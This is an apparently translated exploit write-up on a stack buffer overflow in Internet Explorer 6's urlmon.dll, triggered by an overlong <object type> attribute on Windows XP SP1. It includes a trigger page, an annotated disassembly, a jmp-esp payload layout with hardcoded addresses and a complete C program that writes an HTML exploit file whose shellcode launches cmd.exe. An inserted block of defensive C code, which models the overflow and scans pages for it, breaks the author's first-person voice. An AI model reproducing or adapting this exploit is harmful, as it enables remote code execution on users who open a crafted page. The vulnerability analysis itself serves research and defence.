[Practice] Thoughts on Internet Explorer Object Type property Overflow

Article submitted by: nanika (minjack.tw _at_ yahoo.com.tw)


Nanika@seed.net.tw or minjack.tw@yahoo.com.tw

Test system: Windows XP SP1, Traditional Chinese Professional Edition
Internet Explorer 6.00.2800.1106 (xpsp1.020828-1920)
urlmon.dll 6.00.2800.1170
msvcrt.dll 7.0.2600.1106 (xpsp1.020828-1920)
shlwapi.dll 6.00.2800.1106 (xpsp1.020828-1920)

Below are the technical details I have worked out, offered for reference so that others can study the bug further and develop more general exploitation methods.

Simple exploit:
Construct the following data and save it as a web page file:
<object type="////////////////////////////////////////////////////////////////bbbbaaaadddd">CCCC</object>
Open the constructed page with IE.

RET becomes 44444444, so control flow can be redirected.

It looks like a traditional stack overflow, but one thing is similar to FSO.
[64 '/'][BBBB][AAAA][dddd][any address (EDI)]
AAAA is the EBP value.
dddd is the EIP value.
However, the data that follows is not an ESP value: it is the EDI value.
If the Object type string is carefully constructed, this data section can be written to any address.

However, [any address] may not contain a 00 byte; if it does, the data after it is cut off there, so the value of [any address] is restricted to a certain range and cannot be chosen freely.

In addition, placement is quite awkward: after [any address] there is room for only 40 bytes of data for the shellcode.

This is why RET must be a jmp esp.

For reference:
eEye Digital Security used jmp edx or call edx, but then locating the shellcode in the process has some problems.

Further details

Key function of the buffer overflow, in urlmon.dll:

.text:1A441CF6 sub_1A441CF6    proc near               ; CODE XREF: .text:1A42590Ep
.text:1A441CF6
.text:1A441CF6 var_104         = byte ptr -104h
.text:1A441CF6 arg_0           = dword ptr  8
.text:1A441CF6 arg_4           = dword ptr  0Ch
.text:1A441CF6 arg_8           = dword ptr  10h
.text:1A441CF6
.text:1A441CF6                 push    ebp
.text:1A441CF7                 mov     ebp, esp
.text:1A441CF9                 sub     esp, 104h
.text:1A441CFF                 mov     ecx, [ebp+arg_8]
.text:1A441D02                 push    esi
.text:1A441D03                 mov     esi, ecx
.text:1A441D05                 mov     cl, [ecx]
.text:1A441D07                 test    cl, cl
.text:1A441D09                 lea     eax, [ebp+var_104]
.text:1A441D0F                 mov     [ebp+var_104], cl
.text:1A441D15                 jz      short loc_1A441D35
.text:1A441D17
.text:1A441D17 loc_1A441D17:                           ; CODE XREF: sub_1A441CF6+3Dj
.text:1A441D17                 cmp     cl, 2Fh
.text:1A441D1A                 jnz     short loc_1A441D2B
.text:1A441D1C                 mov     byte ptr [eax], 5Fh ; expand '/' (2Fh) into "_2F_"
.text:1A441D1F                 inc     eax
.text:1A441D20                 mov     byte ptr [eax], 32h
.text:1A441D23                 inc     eax
.text:1A441D24                 mov     byte ptr [eax], 46h
.text:1A441D27                 inc     eax
.text:1A441D28                 mov     byte ptr [eax], 5Fh
.text:1A441D2B
.text:1A441D2B loc_1A441D2B:                           ; CODE XREF: sub_1A441CF6+24j
.text:1A441D2B                 inc     esi
.text:1A441D2C                 mov     cl, [esi]
.text:1A441D2E                 inc     eax
.text:1A441D2F                 test    cl, cl
.text:1A441D31                 mov     [eax], cl       ; string copy with no length check: this is where the buffer overflows
.text:1A441D33                 jnz     short loc_1A441D17
.text:1A441D35
.text:1A441D35 loc_1A441D35:                           ; CODE XREF: sub_1A441CF6+1Fj
.text:1A441D35                 lea     eax, [ebp+var_104]
.text:1A441D3B                 push    eax
.text:1A441D3C                 mov     eax, [ebp+arg_4]
.text:1A441D3F                 push    offset dword_1A441D5C
.text:1A441D44                 dec     eax
.text:1A441D45                 push    eax
.text:1A441D46                 push    [ebp+arg_0]
.text:1A441D49                 call    ds:wnsprintfA
.text:1A441D4F                 add     esp, 10h
.text:1A441D52                 xor     eax, eax
.text:1A441D54                 pop     esi
.text:1A441D55                 leave
.text:1A441D56                 retn    0Ch             ; returns to the address in dddd
.text:1A441D56 sub_1A441CF6    endp
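To make the expansion in the listing concrete, here is an added C example (it is not code from the advisory or from urlmon.dll). It models the copy loop's '/' to "_2F_" expansion, which is why 64 slashes already fill 256 of the 260 (0x104) buffer bytes, puts the bounded copy the function should have used beside it, and scans a page for an <object type="..."> value whose expanded length exceeds the buffer, the kind of check a content filter could apply. The buffer size and the expansion rule come from the listing above; the sample HTML and the scanner's limits (first <object> tag, double-quoted attribute only, no entity decoding) are my own assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* var_104: the stack buffer of urlmon!sub_1A441CF6 in the listing above. */
#define URLMON_TYPE_BUF 0x104

/* 64 slashes, the prefix used in the page's layout (constructed here). */
#define SL8  "////////"
#define SL64 SL8 SL8 SL8 SL8 SL8 SL8 SL8 SL8

/* Bytes the copy loop at loc_1A441D17 stores for the first n bytes of src,
 * including the terminating 00: each '/' (2Fh) becomes the four bytes "_2F_",
 * every other byte is copied unchanged. */
size_t urlmon_expanded_len_n(const char *src, size_t n)
{
    size_t out = 0, i;
    for (i = 0; i < n && src[i]; i++)
        out += (src[i] == '/') ? 4 : 1;
    return out + 1;                     /* the loop also stores the final 00 */
}

size_t urlmon_expanded_len(const char *src)
{
    return urlmon_expanded_len_n(src, strlen(src));
}

/* The same expansion with the length check the original lacks. Returns the
 * number of bytes written (without the 00), or -1 when the expanded string
 * would not fit in dst[cap]; dst is left empty in that case. */
int expand_type_bounded(char *dst, size_t cap, const char *src)
{
    char *p = dst;
    if (cap == 0 || urlmon_expanded_len(src) > cap) {
        if (cap) dst[0] = '\0';
        return -1;
    }
    for (; *src; src++) {
        if (*src == '/') { memcpy(p, "_2F_", 4); p += 4; }
        else             *p++ = *src;
    }
    *p = '\0';
    return (int)(p - dst);
}

/* Case-insensitive search helpers for the small attribute scanner below. */
static int ci_prefix(const char *s, const char *pre)
{
    for (; *pre; s++, pre++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*pre)) return 0;
    return 1;
}
static const char *ci_strstr(const char *hay, const char *needle)
{
    for (; *hay; hay++)
        if (ci_prefix(hay, needle)) return hay;
    return NULL;
}

/* Find the value of the first type="..." attribute after the first <object>
 * tag. Sets *val/*len to the span between the quotes and returns 1, else 0.
 * Deliberately minimal: double quotes only, no entity decoding. */
int find_object_type(const char *html, const char **val, size_t *len)
{
    const char *tag = ci_strstr(html, "<object"), *p, *q;
    if (!tag || !(p = ci_strstr(tag, "type"))) return 0;
    p += 4;
    while (*p == ' ' || *p == '\t') p++;
    if (*p++ != '=') return 0;
    while (*p == ' ' || *p == '\t') p++;
    if (*p++ != '"') return 0;
    if (!(q = strchr(p, '"'))) return 0;
    *val = p;
    *len = (size_t)(q - p);
    return 1;
}

/* 1 when the page's <object type="..."> would overrun var_104, else 0. */
int html_object_type_overflows(const char *html)
{
    const char *val; size_t len;
    if (!find_object_type(html, &val, &len)) return 0;
    return urlmon_expanded_len_n(val, len) > URLMON_TYPE_BUF;
}

/* Constructed samples: the layout from the text, and a harmless page. */
const char sample_page[] = "<object type=\"" SL64 "bbbbaaaadddd\">CCCC</object>";
const char benign_page[] = "<object type=\"text/html\" data=\"page.htm\"></object>";
static char scratch[URLMON_TYPE_BUF];

int main(void)
{
    const char *val; size_t len;
    find_object_type(sample_page, &val, &len);
    printf("sample: %zu expanded bytes vs %d-byte buffer -> %s\n",
           urlmon_expanded_len_n(val, len), URLMON_TYPE_BUF,
           html_object_type_overflows(sample_page) ? "OVERFLOW" : "fits");
    printf("benign: %s\n", html_object_type_overflows(benign_page) ? "OVERFLOW" : "fits");
    printf("bounded copy of 64 '/': %d\n",
           expand_type_bounded(scratch, sizeof scratch, SL64));
    printf("bounded copy of 64 '/' + bbbb: %d\n",
           expand_type_bounded(scratch, sizeof scratch, SL64 "bbbb"));
    return 0;
}
```

The arithmetic matches the layout in the text: 64 slashes expand to 256 bytes, the four BBBB bytes fill the buffer to exactly 260, and the 00 stored by the loop is already one byte past it, so AAAA lands on the saved EBP and dddd on the return address. The bounded version rejects the same input outright, which is the fix the function needed.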

To exploit this vulnerability with jmp esp, construct a string like this:

<object type="[64 '/'][BBBB][AAAA][jmpesp][0x30800101][A*8][40 bytes of shellcode]">CCCC</object>

AAAA is the value that overwrites EBP; it must survive the wide-character encoding.

jmpesp is the value that overwrites EIP; a jmp esp in ntdll.dll at 77fb59cc can be used, and it must survive the wide-character encoding.

0x30800101 is a writable location that contains no 00 byte. It is there to get safely past the call ds:wnsprintfA, and it must survive the wide-character encoding.

A*8 is not used; any value that survives the wide-character encoding will do.

The shellcode must also survive the wide-character encoding (which is not the same on every system) and has only 40 bytes available, so it should be as compact as possible.

After discussing the exploitation method with eyas:
The 40-byte shellcode can also be used to search memory for the real shellcode, with the real payload placed in <realshellcode><object type="[64 '/'][BBBB][AAAA][jmpesp][0x30800101][A*8][40 bytes of shellcode]">CCCC</object>, or anywhere else, as long as it can be found in memory.

I used the simple method: I wrote a shellcode that fits the Traditional Chinese version and jumped to it with jmp esp.

Exploit:

#include <direct.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <sys/stat.h>
#include <winnls.h>
#include <lm.h>

unsigned char shellcode[27] =
"\x68\x63\x6d\x64\x20"      // push "cmd "
"\x8b\xc4"                  // mov eax, esp
"\x50"                      // push eax
"\xb8\x44\x80\xbf\x77"      // mov eax, system_fun_addr
"\xff\xd0"                  // call eax
"\x41\x41"                  // inc ecx = NOP
"\xb8\xfd\x98\xe5\x77"      // mov eax, exitprocess_fun_addr
"\xff\xd0"                  // call eax
"\x41\x41";                 // inc ecx = NOP

unsigned char eipaddr[5] =
"\xcc\x59\xfb\x77";         // jmp esp, ntdll.dll addr 77fb59cc, passes widechar

unsigned char pad[5] =
"\x30\x80\x10\x01";

unsigned char buf[65] = "";
int j = 0;
int i = 0;

void main()
{
    unsigned char temp;
    unsigned char change;
    char path[256];
    FILE *bof;
    struct stat st;

    printf("\n\tbuffer overflow in Internet Explorer Object Type property overflow\n\tbig5 Unicode exploit by nanika\n\ttest windowsxp_sp1 big5 Ver\n\temail: minjack.tw@yahoo.com.tw or Nanika@seed.net.tw\n");
    strcpy(path, "\\assumer_exp_nanika");
    mkdir(path);
    SetFileAttributes(path, FILE_ATTRIBUTE_READONLY);
    strcat(path, "\\exploit_ie_overflow.htm");
    if (stat(path, &st) == 0)
    { remove(path); exit(1); }  // just execute this program twice to remove this file
    bof = fopen(path, "w");
    fputs("<object type=\"", bof);
    for (i = 0; i < sizeof(buf);)
    {
        buf[i++] = 0x2f;            // 64 slashes, expanded 4x by urlmon
    }
    buf[sizeof(buf) - 1] = 0;
    fprintf(bof, "%s", buf);        // buff
    fputs("aaaa", bof);             // pad
    fputs("aaaa", bof);             // EBP
    fprintf(bof, "%s", eipaddr);    // RET --> jmp esp [NTDLL]
    fprintf(bof, "%s", pad);        // EDI
    fputs("aaaaaaaa", bof);         // pad
    fprintf(bof, "%s", shellcode);  // shellcode
    fputs("\">CCCC</object>", bof);
    fclose(bof);
    printf("\nexploit file: %s created.\nif success open exploit_ie_overflow.htm exec cmd.exe\ntry exe again will kill exploit file\n", path);
}

Besides the two methods above, the call ds:wnsprintfA could also be used, since a block of data can be written to an arbitrary address; however, the writable address must be located precisely and must survive the wide-character encoding.

Other exploitation methods will need further research by experts.

I hope reading this article has been of some use to you.

Thank you for reading.
